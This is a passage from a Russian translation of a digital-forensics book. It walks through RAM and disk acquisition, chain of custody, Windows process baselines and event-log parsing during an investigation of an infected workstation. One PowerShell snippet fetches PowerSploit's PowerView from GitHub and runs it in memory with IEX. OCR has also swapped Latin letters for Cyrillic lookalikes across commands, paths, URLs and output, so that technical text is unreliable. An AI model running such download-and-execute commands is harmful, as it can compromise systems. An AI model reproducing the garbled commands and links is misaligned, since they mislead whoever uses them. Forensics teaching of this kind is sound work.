Это немного затрудняет задачу, как вы уже наверное 
догадались, но мы обсудим это в деталях. 

Конечно, подобные “сырые” операции не должны 
выполняться, пока зараженный хост работает; в противном случае, 
это становится пустой тратой времени. 

Нам нужно выполнить так называемое точное побитовое 
копирование НАМ и диска, и получить любую релевантную 
информацию из этих замороженных снапшотов. 

Подумайте об этом как о некоей футуристичной инвазивной 
диагностике. Вместо исследования живого тела, мы замораживаем 
его, клонируем и беремся за скальпель! Исходное тело не 
повреждается во время этого процесса, при этом мы сохраняем 
возможность точно узнать, что с ним не так. 

Мы всегда начинаем сбор данных в порядке их волатильности: 

• Сначала ПАМ, поскольку она изменяется каждую наносекунду 
и определенно будет изменена будущими операциями, 
которые мы будем выполнять. 

• Далее, Ііѵе-информация в системе: открытые порты, 
работающие процессы и т.д. (поддельные данные, но это 
всегда может пригодиться). 

• И наконец, данные с жесткого диска. 

Все меньше и меньше в расследованиях полагаются на 
данные с жестких дисков, поскольку малварь научилась жить только 
в памяти, чтобы избегать антивирусного программного 

22 Некоторые руткиты удаляют связь своего процесса из этого списка, чтобы скрыть свое 
присутствие. Мы можем использовать другие методы, которые будут описаны позже, чтобы в 
любом случае найти их, типа сканирования по тегам пулов (рооі-іад зсаппіпд). 



обеспечения. И все же, лучше иметь копию диска, на случай, если 
нам она когда-нибудь понадобится. 

**Что мы рассчитываем обнаружить в памяти?** 

Каждая операция, выполняемая операционной системой, 
преобразуется в памяти и часто может сохраняться в течение 
длительного времени после завершения задачи. 

Память предоставляет свежее и надежное описание текущего 
состояния операционной системы: запущенные процессы, открытые 
файлы, сетевые соединения, ключи реестра, загруженные в память, 
ІІЗВ-устройства и так далее. 

Стоит отметить, что для оптимизации своей 
производительности операционная система часто копирует 
некоторые объекты памяти на диск, если они не используются. 

Эти объекты размещаются в блоках памяти, тегируемых как 
“радеаЫе” (выгружаемые, страничные), и таким образом, они могут 
временно исчезать из памяти. Вот почему важно собирать файлы 
подкачки / страничные файлы (радейіе.зуз 23 в ѴѴіпсІоѵѵз), чтобы 
иметь полное представление о системе. 


**** 


Перед тем, как двигаться дальше, вы должны быть в курсе о 
рисках по извлечению памяти. Большинство операционных систем 
не предоставляют чистого и простого способа извлечения памяти в 
целях криминалистической экспертизы. 24 


23 Местоположение файлов подкачки указано в ключе реестра: 
НКІ_М\5Ѵ5ТЕМ\СопІгоІ5еЮ01\Соп1гоІ\Зез5Іоп МападеіЛМетогу Мападетепі 

24 Файлы подкачки (радеГІІе.зуз) и файлы спящего режима (МЬегТіІ.зуз) не являются реальными, 
точными копиями памяти. Аварийные дампы памяти приводят к перезагрузке системы, изменяя 
машину еще больше. 



Инструменты по извлечению памяти вынуждены “читерить”, 
используя функции АРІ ядра 25 (МтМарІоБрасе, МтМарМетогуОитрМсІІ 
и так далее), чтобы привязывать физическую память, которой они 
не владеют, к своему виртуальному адресному пространству. 

Это может привести к неожиданному поведению, в 
зависимости от приложений, запущенных на машине во время 
извлечения. Зачем вообще делать это? Как вы поймете на личном 
опыте позже, награда очень сильно перевешивает риск. 

Мы готовим ІІЗВ-флешку, содержащую несколько 
инструментов и скриптов для сбора РАМ и Ііѵе-артефактов: 

• Набор инструментов ОитрІІ: 26 для извлечения РАМ. 

• Кастомный скрипт для сбора работающих процессов, сетевых 

соединений, логов событий и так далее (подробности позже). 

Помните, что подключая ІІЗВ-флешку в зараженную машину, 
мы изменяем некоторые ключи реестра, но это скорее всего не 
навредит никаким уликам, которые мы собираем. 


25 Некоторые умные вредоносные программы могут перехватывать эти функции АРІ для 
модификации их поведения и делать невозможным извлечение памяти. Ознакомьтесь с 
исследованием о надежном извлечении памяти: 

И№://оІсІ.сИ : г\л/5.ога/2013/ргосеесІіпа5/РРРѴѴ32013-р13.рсИ : 

26 НііР5://сотае.іѵре1огт.сот/іо/ХІѵМа7 или МНр:/АооІ5.сотае.іо/сотае-іооІкШідІтІ/ 

Сотае-Т ооІкіИідІтІ-3. 0.20170620.1 .гір 

(прим, переводчика: ссылки устарели; для бесплатной загрузки йитріі необходимо 
зарегистрироваться здесь : ННр5://тѵ.сотае.іо/ ) 
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Мы запускам набор инструментов йитріѣ при помощи 
следующей команды: 


0 :> сіитрі1:.ехе /оиірігі::ЫК0025_с1итр_03142017.сітр 


ОезТіпаТіоп раТЬ: \??\0: \5СгірТ_Ьагпеу5_тасНіпе\тетогу\ЫКѲ025_сІипір_Ѳ3142Ѳ17 . сігар 

СотриТег пате: ИКѲѲ25 


--> РгосеесІ міТЬ ТИе асяиізіТіоп ? [у/п] у 
[+] Іп-ЕогтаТіоп: 

йитр Туре: Місгозо-ЕТ СгааРі Эитр 


[ + ] МасНіпе Іп-рогтаТіоп: 

Иіпсіомб ѵег5Іоп: 10.Ѳ. 14393 

МасИіпеІсІ: ІЗѲА56Р12-РРАС-4А40-В542-Р287ВА628СР2 


Примерно через пять минут мы получаем дамп памяти вместе 
с файлом, содержащим ключевую информацию: хэш памяти, Ю 
машины, имя хоста и т.д. 

[-] 

"-Рііеіп-Ро": { 

"-РіІеБіге" : 1073274880, 

"5Иа2Б6": 

"с!08абЫ : Зс10Т4Тс171а717сІ7490Ь45а9511а28972е9Ь74602есТбсс46е72сб974с1" 

ь 

"тасНіпеІп-Ро" : { 

"апсИНесЬигеТуре": "х86", 

"сІаТе" : "2017-07-14Т10:26:22.0452", 

" сІотаіп№те " : " І.Е05ТКАКТ . СОКР", 

"тасіііпеісі" : "О0А56Р12-РРАС-4А4О-В542-Р287ВА628СР2", 







"тасІііпеМате": "ІЛІК0025", 

[-] 

**Цепочка сохранности вещественных доказательств** 

Важно обеспечить, чтобы каждый артефакт, собранный во 
время расследования, был захэширован 27 , и ему была проставлена 
метка времени. Кроме того, все основные шаги процесса 
извлечения должны быть строго задокументированы, чтобы 
обеспечить так называемую цепочку сохранности вещественных 
доказательств 28 , это важный аспект юридически законных 
криминалистических действий. 

Если эта цепочка нарушена, улики будут не приняты судом. 
Некоторые утилиты типа Оитріі обеспечивают эту информацию 
автоматически, что облегчает задачу. 

Речь не только о доказательстве законности улик, но и о 
нашей собственной защите от потенциальных исковых претензий со 
стороны владельца машины (Барни), если он попытается обвинить 
нас в превышении наших служебных полномочий при получении 
доступа к критическим персональным данным. 


**** 


Мы продолжаем процесс извлечения, запуская кастомный 
скрипт, который приготовлен у нас 29 : 


27 Используйте алгоритм ЗНА 256, чтобы избежать коллизий хэш-функции и атак нахождения 
прообраза. Пора избавиться от ІѴЮ5 и ЗНА1. 

28 В некоторых странах процесс извлечения должен проводиться под наблюдением 
уполномоченного сотрудника правоохранительных органов, чтобы эти данные были приняты в 
суде. 

29 Скрипт рзігее.рзі, выводящий взаимосвязь родитель-дочерний элемент, а также другую 
интересную информацию, можно найти по ссылке: 

ИНр5://діІНиЬ.сот/НаскІ_ікеАРот5іаг/І_ео5ігіке/ЫоЬ/гпа5іег/р5ігее.р5І 
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По окончании извлечения мы отключаем ІІЗВ-флешку и 
подсоединяем ее к подопытной машине, которую мы настроили с 
нуля и которая не содержит никаких критических ресурсов вообще. 





Мы не знаем, что за малварь заразила компьютер Барни, 
поэтому не можем гарантировать безопасность этой ІІ8В-флешки. 
Все, что мы знаем, его компьютер является основным вектором 
распространения. 

Чтобы избежать любых сюрпризов, и до того времени, пока мы 
не начнем лучше понимать ситуацию, мы избегаем подключения 
этой ІІЗВ-флешки в другие машины без выполнения полного 
форматирования. 

Копируем данные, полученные с компьютера Барни, на эту 
промежуточную машину, затем настраиваем общую сетевую папку, 
к которой у нас будет доступ с машины для анализа, чтобы 
копировать данные. 

Примечание: во время всех своих исследований всегда 
используйте свежеустановленную машину для анализа. 

Мы делаем две копии полученных данных на две разные 
дополнительные ІІЗВ-флешки: одну для руководителя отдела НК, 
другую в целях резервного копирования, на случай, если собранные 
объекты будут повреждены. 

Далее мы переходим к жесткому диску. Есть разные варианты 
копирования диска, нам стоит разобраться с ними: 

• Логическое копирование: мы подключаем ІІЗВ-флешку и 
попросту переносим на нее папку С:. Это недопустимый 
процесс криминалистического извлечения, поскольку он 
заменяет МАС-атрибуты файлов и папок (МосІіЛсаііоп, Ассезз, 
Сгеаііоп; время Изменения, Доступа и Создания), теряется 


пространство остаточных файлов 30 и Главная загрузочная 
запись (МВГС 31 ), и так далее. 

• Копирование томов: используя стороннее программное 
обеспечение, мы копируем блочное устройство, которое 
отображает логический раздел (/сіеѵ/зсіаі в Ыпих или 
\\.\РНѴ5ІСАЮКІѴЕ0/Раг1:і1:іоп1 в ѴѴіпсІоѵѵз). Так легче 
анализировать, поскольку мы можем напрямую парсить 
файловую систему, но мы теряем важные данные, не 
представленные в файловой системе: Главную загрузочную 
запись (МВР), резервную копию МВК, остаточные файлы тома 
и проч. (больше деталей о структуре дисков далее в книге). 

• Копирование физического диска: мы копируем целиком весь 
жесткий диск, обычно отображаемый как /сіеѵ/зсіа в Ыпих или 
\\. \РНѴ5ІСАЮКІѴЕ0/ в ѴѴіпсІоѵѵз. Обычно он состоит из МБР, 
раздела 1 (С:), раздела 2 (Б:), остаточных данных обоих 
разделов и т.д. Становится труднее анализировать, поскольку 
нам нужно изолировать каждую файловую систему, но мы 
получим самую точную картину. 

Чтобы выполнить копирование физического диска, сначала мы 
выключаем компьютер, отсоединяя кабель питания и батарею. 

Важно не использовать стандартную функцию выключения, 
поскольку малварь может потенциально перехватить этот вызов и 
стереть свое присутствие на диске. 

Мы разбираем системный блок и снимаем жесткий диск. 


30 Подробнее об этом позже. 

31 МВН составляет первые 512 байтов, которые запускают операционную систему. Подробнее 
об этом позже, в процессе анализа диска. 




Этим мы не нарушаем никаких правил форензики, так как мы 
уже собрали РАМ и Ііѵе-данные, поэтому уже имеем замороженное 
Ііѵе-состояние зараженной системы. 

Подключаем диск к физическому блокировщику записи 32 , 
чтобы сохранить его целостность, затем подключаем устройство по 
118В к нашему компьютеру, где установлен РТК Ітадег 33 , 
инструмент для выполнения точного побитового копирования: 



32 Блокировщик записи предоставляет физический барьер, защищающий диск от случайных 
операций записи, которые могут быть выполнены компьютером следователя. 


33 ННр://ассе55баіа.сот/ргобисі-бо\л/пІоаб/Пк-ітасіег-ѵег5Іоп-3.4.2 











Мы запускаем копирование полного диска и оставляем на 
несколько часов, пока оно выполняется . 34 


М АссегаОаІа РТК Ітадег 3.4.2.6 

Рііе Ѵіеѵѵ Мосіе Неір 


Э) % (Э 
Еѵісіепсе Тгее 


»ІІ Ч 


СгеаІе 


аде 


>< 


Ітаде Боигсе 

[^дрнуіісаЕойѵёГ 


ЗІагЙпд Еѵісіепсе ІМитЬег: 11 

Ітаде С>е5ЙпаНоп(5) 

О:\Ьагпеу_ѵѵк0025_03142017 [гаѵѵ/сісі] 


Тем временем, мы переключаем наше внимание на 
артефакты в собранных Ііѵе-данных и памяти. Именно там, скорее 
всего, находятся самые ценные находки. 

**Примечание по физическому блокировщику записи** 

Для сохранения целостности диска (как, впрочем, и цепочки 
сохранности улик) критически важно монтировать его в режиме 
геасі-опіу. Даже если один бит диска будет изменен, вычисленный 
хэш изменится, что поставит под сомнение улики, собранные в ходе 
анализа. 

Поэтому критически важно обеспечить, чтобы машина для 
анализа не нарушила улики в процессе извлечения. 

Например, ѴѴіпсіоѵѵз может автоматически примонтировать 
внешний диск, в результате чего произойдет перезапись времени 
системного журнала. 


34 Образ жесткого диска также копируется на две дополнительные ІІЗВ-флешки. 





















Тоже самое и с І_іпих, хотя имеется возможность отключить 
автоматическое монтирование и в явной форме выполнить 
монтирование в режиме геасі-опіу, используя “тоштЬ -го.,по1оасГ. 

Хотя по-прежнему, нет гарантий, что какой-нибудь 
поврежденный драйвер с доступом к ядру на машине ничего не 
запишет по ошибке на зараженный диск. 

Физический блокировщик записи, в свою очередь, блокирует 
сигналы на запись на физическом уровне, таким образом 
гарантируя целостность копируемого жесткого диска. 35 


**** 


Анализ данных 

Если вы когда-либо проводили криминалистическое 
расследование, вы должны быть знакомы со следующей 
информацией. 

Это часть расследования, в которой мы чувствуем, что не в 
состоянии справиться с объемом собранных данных. К настоящему 
времени у нас есть копия памяти (4 ГБ), копия диска (320 ГБ) и 
Ііѵе-данные (~КБ). 

Так много гигабайтов данных, в которых атакующий или 
малварь могут спрятать себя: ключи реестра 36 , задания (іоЬз) 
компонента ѴѴіпсІоѵѵз ВИЗ 37 , ЭИ на диске, ЭИ в памяти, файлы, 
МВГС 38 и так далее. Мы попросту оказываемся перегружены и даже 


35 И^Р5://\л/\л/\л/.сШ.пІ5Ідоѵ/І~іагсІѵѵаге ѵѵгііе Ыоск.Ніт 

36 НіЬ://ѵѵѵт.Нехасогп.сот/ЬІод/2017/01/28/ЬеѵопсІ-доосі-оІ-гип-кеѵ-аІІ-рагі5/ 

37 НіЬ://0хіНет.Ыод5РоГ1т/2014/03/ТетрогаІ-рег5І5іепсе-\л/іі[>апсІ-5сНіа5к5.НітІ 

38 ГіНр5://ѵѵікіІеакз.огд/сіаѵ7р1/ст5/раде 2621757.НітІ 







не знаем, с чего начать. Это подобно первому чистому листу для 
писателя. 


Давайте не будем напрягаться и начнем с самых простых для 
парсинга данных: системная и сетевая конфигурация. 


[...] 

НобТ Мате: 

0$ Мате: 

05 Ѵепзіоп: 

БузТет Туре: 

[...] 

ЕіЬегпеІ асіаріег ЕСЬегпеС 


ЫК0025 

МісгозоТі: Ыіпсіоѵѵб 10 Рго 

10.0.14393 М/А Виіісі 14393 
Х86-Ьагесі РС 


СоппесІіоп-зресі-Ріс ЭМБ БиТТіх . : І.Е05ТРАТ.С0РР 


ОеБсгірІіоп.: Іп1:е1(К) РРО/1000 МТ йевкіор АгіарТег 

РМузісаІ АсІсІгеББ.: 08-00-17-О1-С8-80 

йНСР ЕпаЬІесІ.: Ѵез 

ІРѵ4 АсісігеББ.: 192.168.1.25 

5иЬпе1 Мазк . : 255.255.255.0 

[...] 


Мы имеем дело с машиной под ѴѴіпсІоѵѵз 10, 32-битная 
архитектура, которая является членом домена ѴѴіпсІоѵѵз 
І.Е05ТКАТ.С0КР. Как и ожидалось, ІР-адрес этой машины совпадает 
с адресом, который мы видели в логах файрвола несколькими 
часами ранее. 

Давайте посмотрим на текущие запущенные процессы на 
машине (вывод пути образа и командная строка обрезаны, чтобы 
уместить результаты на одной странице). 








РЮ Цате 


2848 ехріогег.ехе 
808 . .М$А$СиіІ_.ехе 
2132 ..ОпеРгіѵе.ехе 
1912 .. стсі. ехе 
3100 ... .сопНобі:. ехе 
1916 ....роыегБЬеІІ. 


Цзег 


ЫКѲ025\мк_асітіп 

ЫКѲ025\мк_ас1тіп 

ЫКѲ025\ик_асІтіп 

1\ІК0025\мк_асітіп 

ЫКѲ025\ѵѵк_асітіп 

1\ІК0025\мк_асІтіп 


Іта§е РаіН 


С: \Ыіпсіом5\Ехр1ог... 
С:\Рго§гат Р... 

С: \1)5ег5\Асітіп... 

С: ХіѵІіпсіомБХБуБІіе... 

С: \№іпсіом5\5у5І: 

С: \ЫіпсІом5\5у5 


Ѳ БуБІет Ісііе РгосезБ 
4 БузТет 
272 .. 5Ш55 .ехе 
356 СБГББ.ехе 
420 міпіпіТ.ехе 
512 ..Бегѵісез.ехе 
860 .... 5ѴСІЮ5І: .ехе 
1712 .. . . бѵсИобі: . ехе 
2040 .... 5ѵс Иоб! . ехе 
2548 .. . . 5ѴСІ105І .ехе 
520 .. І5а55 .ехе 
488 міпіо^оп.ехе 


\ 

\ 

N1 АІГГН0КІТУ\5У5ТЕМ 
N1 АІ)ТН08ІТУ\5У5ТЕМ 
N1 АІЛН0КІТУ\5У5ТЕМ 
N1 АІІТН0КІТУ\5У5ТЕМ 
N1 АІ)ТНОКІТУ\І_ОСАІ_ БЕКѴІСЕ С:\Ыіп... 

N1 АІЯН0КІТУ\1_0САІ_ 5ЕКѴІСЕ С:\Ыіп... 

N1 АІІТНОКІТУ\ЮСАІ. 5ЕКѴІСЕ С:\Міп... 
ЫК0025\мк_асІтіп С:\Ыіп... 

N1 АІІТН0КІТУ\5У5ТЕМ С:\ІѵІіп... 

N1 АІЛН0КІТУ\5У5ТЕМ С: \Ыіпсіоы5\5у... 


[...] 


Чтобы обнаружить какие-либо отклонения, вам сначала нужно 
понимать, что из себя представляет “стандартная” ситуация в 
окружении ѴѴіпсІоѵѵз 39 . Вот критические системные процессы, 
которые вы можете повстречать на любой ѴѴіпсІоѵѵз-машине: 

• Ісііе и Бузѣет: это просто контейнеры, используемые для 
выполнения потоков ядра. Это, по сути, не настоящие 
процессы, поскольку их нельзя привязать к какой-либо 
физической программе на диске. 

• Бтзз.ехе: диспетчер сеансов - первый настоящий процесс 
пользовательского режима, запускаемый на старте системы. 
Один главный сеанс работает всегда и порождает столько 
потомков, сколько имеется сеансов. Потомки обычно 

39 Я могу порекомендовать вам прочитать статью от Патрика Олсена под названием “Разберись 
со своими процессами ѴѴіпсІоѵѵз любой ценой” (прим, переводчика: оригинальная ссылка 
откинулась, вставил архивную версию)'. 


НіЬз://ѵѵеЬ.агсЫѵе.ога/ѵѵеЬ/201 70501060949/ННр://5У5Тогеп5Ю5.огд/2014/01 /кпоѵѵ-ѵоиг-ѵѵіпсіоѵѵз-рго 

сеззез/ 










завершаются после входа в систему. Его родительский 
процесс - это процесс Бузует. 

Ілііпіпіі.ехе: это процесс инициализации ѴѴіпсІоѵѵз. Он 
порождается потомком Бтзз.ехе, но как только тот 
завершается, Міпіпііі.ехе остается без родителя. 

СзгББ.ехе: это клиент/серверная подсистема, которая 
обрабатывает создание и удаление процессов. Есть один 
экземпляр на подключенного пользователя. Его родительский 
процесс - Бтзз.ехе, но как только тот завершается, Сзгзз.ехе 
остается без родителя. 

1лііп1о§оп .ехе: этот процесс предоставляет приглашение для 
интерактивного входа в систему, помогает загружать профили 
пользователей и т.д. Его родительский процесс - Бтзз.ехе, но 
как только тот завершается, Міп1о§оп.ехе остается без 
родителя. 

Цзегіпііі.ехе: этот процесс запускается после успешного 
входа в систему. Он загружает сетевые подключения и 
сценарии входа. Обычно он завершается по выполнению 
своих задач, поэтому мы вряд ли увидим, что он использует 
обычные Ііѵе-запросы. 

Ехріогег.ехе: у этого процесса пропадает родительский 
процесс, как только завершается Цзегіпііі.ехе. Все 
программы, запущенные с рабочего стола или из меню “Пуск”, 
являются потомками Ехріогег.ехе. 

І-Базз.ехе: этот процесс обрабатывает аутентификацию, и 
обычно на него нацеливаются вредоносные программы в 
целях получения хэша пароля или пароля в открытом виде. 
Его родительский процесс - Міпіпііі.ехе. 

Бегѵісез.ехе: диспетчер управления службами обрабатывает 
все службы ѴѴіпсІоѵѵз. Есть один экземпляр на систему, и он 
должен быть родителем любого процесса зѵсііозіі.ехе, а 
также зрооізѵ.ехе и БеагсИІпсІехег.ехе. 

БѵсИозІі.ехе: вы обнаружите множественные экземпляры 
зѵсИозІі.ехе, работающие в системе, каждый из которых 


загружает различные библиотеки ОН под разные задачи. Его 
родительский процесс - Бегѵісез.ехе. 

Просматривая дерево процессов, мы можем буквально 
следовать по шагам заданного пользователя. К примеру, мы ясно 
видим, что наша учетная запись іл/к_асІтіп (используемая для 
процесса извлечения) открыла окно проводника, породила 
интерпретатор командной строки и выполнила РоѵѵегЗИеІІ-команды 
(скрипт 1іѵе_аг1:і-Рас1:). 

Кроме того, мы знаем, что в системе работает ВіЮеІвпсІег 

(М5А5СиіІ_.ехе). 

Чтобы разобраться в этом длинном списке процессов и 
выявить подозрительные процессы, мы обычно ищем один или 
комбинацию из следующих объектов: 

• Процесс с неправильным родителем (ІзазБ.ехе с 
ехріогег.ехе в качестве родителя). 

• Образ исполняемого файла находится по неправильному пути 

(программа работает из с: Метр или 

с: \и5егз\<и5ег>\аррсІа1:а\1оса1). 

• Процессы с ошибками в названии (например, с5Г555.ехе). 

• Необычные аргументы командной строки (длинные строки 
команд или строки, содержащие ІЖІ_ и подозрительные 
параметры). 

К нашему сожалению, ни один процесс не выделяется в этом 
предварительном анализе. Все процессы легитимны и работают из 
доверенных локаций. 

Конечно, эта оценка в любом случае необъективна, так что мы 
проверим это утверждение позже путем анализа памяти. 


Еще один артефакт, который мы ранее собрали, это журнал 
безопасности. 40 Он фиксирует связанные с безопасностью события 
типа аутентификации, изменений групп и так далее. Эта 
информация поможет нам восстановить, что произошло в системе 
некоторое время назад. 

ѴѴіпсІоѵѵз присваивает уникальный идентификатор каждому 
событию, аудируемому в системе. Мы сфокусируемся на 
следующих трех номерах: 

• Еѵепі: Ю 4624: успешная аутентификация. 

• Еѵепі: Ю 4648: попытка входа с использованием 
альтернативных учетных данных (гипаз, запуск от имени, 
например). 

• Еѵепі: Ю 4672: вход под учетной записью суперпользователя. 

Давайте вернемся в прошлое, распарсив файл 
зесигіѣу.еѵЬх, чтобы отделить эти идентификаторы событий при 
помощи РоѵѵегЗНеІІ-команды §еѣ-іл/іпеѵепі:: 


Р5> СеІ-МіпЕѵепІ: -РИТегНаБМгаЫе 

@{раТЬ='. \5есигіТу.еѵТх 1 ; ісІ=4624,4648,4672} 


Р5 С:\ІІ5ег5\Асіітппт5Тга1ог\0е5ІсЬор> СеТ-іѵ'іпЕѵепІ: 

Ргоѵі сіегМате: Мт сгоаоП-Мі псіоѵѵБ-БесигіІу-АисітІт пд 
ТітеСгеаІесі Ісі ІеѵеЮіарІауМаліе Меаааде 


@{раТИ 


;ісі 4624 4648 4672} 


3/14/2017 

3/14/2017 

3/14/2017 

3/14/2017 

3/14/2017 

3/14/2017 

3/14/2017 

3/14/2017 

3/14/2017 


9:09 

9:09 

9:09 

8:25 

8:25 

8:25 

7:28 

7:28 

7:28 


:31 АМ 
:31 АМ 
:31 АМ 
:5б АМ 
:56 АМ 
:56 АМ 
:48 АМ 
:48 АМ 
:48 АМ 


4672 ІпГогпаІіоп Брест аі ргтѵтіедеа ахаідпесі 
4624 ІпГогтаІіоп Ап ассоипі ѵѵа$ БиссеааТиПу 
4648 ІпТогтаТіоп А Іодоп ѵѵа5 аТІетрТесі иаіпд 
4672 ІпТогтаІіоп Бресіаі ргіѵііедеа аааідпесі 
4624 ІпТогтаТіоп Ап ассоипі ѵѵаа аиссеааТиІІу 
4648 ІпГогпаІіоп А Іодоп ѵѵаа аИетрІесі иаіпд 
4672 ІпГогтаТіоп Бресіаі ргтѵііедеа ааатдпеЗ 
4624 ІпТогтаТіоп Ап ассоипі ѵѵаа аиссеааТиІІу 
4648 ІпТогпаІіоп А Іодоп ѵѵаа аТТелірІесІ иаіпд 


Іо пеѵѵ Іодоп.... 
ІоддесІ оп.... 
ехріісіі: сгесіепііаіа. 
Іо пеѵѵ Іодоп.... 
ІоддесІ оп.... 
ехріісіт сгесіепііаіа. 
Іо пеѵѵ Іодоп.... 
ІоддесІ оп.... 
ехріісіт сгесіепііаіа. 


40 В окружении Асііѵе Оігесіогу все логи событий направляются в контроллер домена. При 
неправильно сконфигурированных параметрах, как в системах І_ео51гаІ, для ОС выделяется 
несколько гигабайтов, чтобы локально хранить эти события, вместо того, чтобы дать ему 
инструкцию на их перенаправление в адрес подходящей системы ЗІЕМ для корреляции и 
хранения. Это означает, что РС хранит примерно от 10 до 24 часов событий в любое заданное 
время. Вот почему мы лучше получим журнал безопасности с машины Барни. 







Выходные данные далеки от идеала. Нам не хватает 
множества интересных полей типа имени учетной записи, 
машины-источника, типа входа, домена и так далее... 

Мало чего есть более раздражающего в ѴѴіпсІоѵѵз, чем парсинг 
логов событий. Не поймите меня неправильно - мы можем извлечь 
множество информации из этих файлов - но низкое качество 
формата делает это в десять раз сложнее. 

Для каждого события нам нужно добавить фильтры, которые 
будут извлекать интересные элементы из поля “тезза^е” 
(сообщение), затем экспортировать результат в СЗѴ-файл, который 
мы сможем легко просмотреть: 

Для событий 4624 нам нужна следующая информация: 

• Имя пользователя, поле номер 5. 

• Домен, поле номер 6. 

• Удаленная рабочая станция (источник аутентификации), поле 

номер 18. 

РоѵѵегЗНеІІ-команда для этого: 


беТ-МіпЕѵепІ: -РіПегНаБІтІаЫе @{раТЬ=‘ .\5есигі1:у .еѵіх';ісі=4624} 

| БеІесТ-ОЬзесІ: -РгорегТу ТітесгеаТесІ, ісі, 

@{1аЬе1='иБегпате';ехрге55Іоп={$_.ргорегТіе5[5].ѵаіие}}, 
@{1аЬе1=' сіотаіп' ; ехрге55Іоп={$_.ргорегТіеБ[6].ѵаіие}}, 
@{1аЬе1='5оигсе';ехрге55Іоп={$_.ргорег!іе5[18].ѵаіие}} 

| ехрогі-сзѵ мк0025_еѵеп1:5_4б24.С5Ѵ _ 


Для события 4648 нам нужна следующая информация: 


• Имя пользователя, поле номер 5. 



• Домен, поле номер 6. 

• Удаленная рабочая станция (источник аутентификации), поле 
номер 12. 

РоѵѵегЗІіеІІ-команда для этого: 


СеТ-ІлІіпЕѵепТ -РіІТегНаБЫіаЫе @{раТЬ=' Дйесигіііу .еѵіх';ісІ=4648} 

| 5е1есТ-0Ь]ес1: -РгорегТу Тітесгеаіесі, ісі, 

@{1аЬе1=' изеппате';ехрге55Іоп={$_.ргорегТіе5[5].ѵаіие}}, 
@{1аЬе1=‘ сіотаіп' ;ехрпе55Іоп={$_.ргорег1;іе5[6]. ѵаіие}}, 

@{1аЬе1='5оигсе';ехрге55Іоп={$_.ргорегТіе5[12].ѵаіие}} 

| ехрог1-с5ѵ мк0025_еѵеп1:5_4648.с5ѵ _ 


Для события 4672 нам нужна следующая информация: 

• Имя пользователя, поле номер 1. 

• Домен, поле номер 2. 

РоѵѵегЗІіеІІ-команда для этого: 


СеІ-МіпЕѵепІ: -РіГЕегНазІтЕаЫе @{раТЬ='ДзесигіТу .еѵіх';ісі=4672} 

| 5е1ес1:-0Ьіес1: -РгорегТу ТітесгеаТесІ, ісі, 

@{1аЬе1=‘ изегпате' ;ехрге55Іоп={$_.ргорег1іе5[1].ѵаіие}}, 

@{1аЬе1=‘ сіотаіп';ехрге55Іоп={$_.ргорег1іез[2].ѵаіие}} 

| ехрог1:-с5ѵ мкѲѲ25_еѵеп1:5_4672. С5Ѵ _ 


Держите в уме, что атакующий может всегда стирать свои 
следы, так что рассчитывать на данные логов не на 100% надежно. 
Но если он поленился, мы автоматически словим джекпот. Шансов 
на положительный результат у нас больше. Мы парсим СЗѴ-файл, 




сосредоточившись в первую очередь на последних 72 часах. До тех 
пор, пока... 


А 

В 

С 

Э Е Р 

1 ТітеСгеэЕес) 

ІСІ 

изегпате 

сіотаіп 

2 3/14/2017 9:09:31 АМ 

4672 

5Ѵ5ТЕМ 

МТАІІТНОКІТѴ 

3 3/14/2017 8:25:56 АМ 

4672 

5Ѵ5ТЕМ 

МТАІЛНОКІТѴ 

4 3/14/2017 7:28:48 АМ 

4672 

\л/к_ас!тіп 

ѴѴК0025 

5 3/14/2017 4:39:45 АМ 

4672 

\л/к_агітіп 

ѴѴК0025 

6 3/14/2017 4:26:35 АМ 

4672 

ѵѵк_асітіп 

ѴѴК0025 

7 3/14/2017 3:56:36 АМ 

4672 

а_ирс)а*е 

1.Е05ТКАТ 

8 3/14/2017 3:55:20 АМ 

4672 

5Ѵ5ТЕМ 

N7 АІІТНОКІТѴ 


Наконец-то, нечто перспективное! Мы знаем, что Барни не 
обладает правами администратора на своем компьютере, кажется 
странным увидеть успешное повышение привилегий, выполненное 
для учетной записи а_ирсІа1:е. 

Это может быть нормальное явление, а может и аномальное. 
Большинство событий 4672 предваряются событиями с Ю 4624, это 
значит, что учетная запись успешно аутентифицировалась на 
машине. 


Однако, в поле “зоигсе” (источник) события 4624 не хватает 
происхождения аутентификации, что указывает на локальный 
сеанс: например, локальная программа могла породить процесс под 
удостоверением а_ирсІа1:е. 

Мы просим предоставить нам обычную машину, 
подключенную к ѴѴіпбоѵѵз Асііѵе Эігесіогу в І_ео81гаі, чтобы получить 
информацию по учетной записи а_ирсІаѣе. Мы используем 
РоѵѵегѴіеѵѵ 41 для простоты, но с такой же легкостью мы могли бы 


41 РоѵѵегѴіеѵѵ - это компонент фреймворка РоѵѵегЗрІоіІ, который чаще всего используется для 
пентеста окружений ѴѴІпсІоѵѵз. Но он также очень полезен и в области форензики, если нам 
нужно извлечь большое количество информации из Асііѵе Оігесіогу. 




воспользоваться официальным РоѵѵегЗИеІІ-модулем МісгозоТС РЗАТ. 

42 


# Определяем объект Ьоомзео 

$Ьгом5ег = Nем-ОЬ^ес■^; БузТет.МеІ.МеЬСІіепІ: 

# Настраиваем дефолтный системный прокси 
$Ьоом5ег.Ргоху .СгесІеп€іаІ5 = 

[Бузует. ИеІі.СгесІеп'ІііаІСасІіе]: :0е-Раи11:Ме€могкСресІеп1:іаІ5 

# Далее удаленно извлекаем и загружаем в память скрипт РомеоѴіем.рзі 
ІЕХ($Ьгом5ег. 0омп1оасІ5'1;гіп§( "ЫТрз: //гам . §і1;МиЬи5епсоп1;еп1. сот/ 
РомеоБбеІІМа-Ріа/РомегБрІогІі/таБТег/Кесоп/РомегѴіем. рзГ’) ) 

# Данные по пользователю 

беі-МеІІІаег а иргіаТе _ 


1о§опсоип1: : 131 
сосІера§е : 0 
сотрапу : І.Е05ТКАТ 
іл/ИепсгеаІесІ : 01/08/2017 
затассоипііпате : а_ирсІа1:е 
соипіоусосіе : 119 

тетЬегоТ : {€N=1)5605,0С=1ео5І:ра1:,ОС=соор, €N=001113^ 

АсIтіп5^СN=^5еР5, 0С=1ео5І:ра1:,ОС=соор, СN=Еп1:ерррІ5е 
АсІтіп5, €N=115605,0С=1ео5І:ра1:,0С=сорр, СN=5сI^ета 
АсІтіп5,€N=1)5605,ОС=1ео5І:оа1:,ОС=соор.. .} 

1а5І1о§оп1:іте5І:атр : 03/14/2017 03:10:44 
и5еороіпсіраіпате : а_ирсІа1:е@1ео5'1;оа1:. соор 

Интересно, а_ирсІа1:е была создана два месяца назад и 
является членом группы администраторов домена, самой 
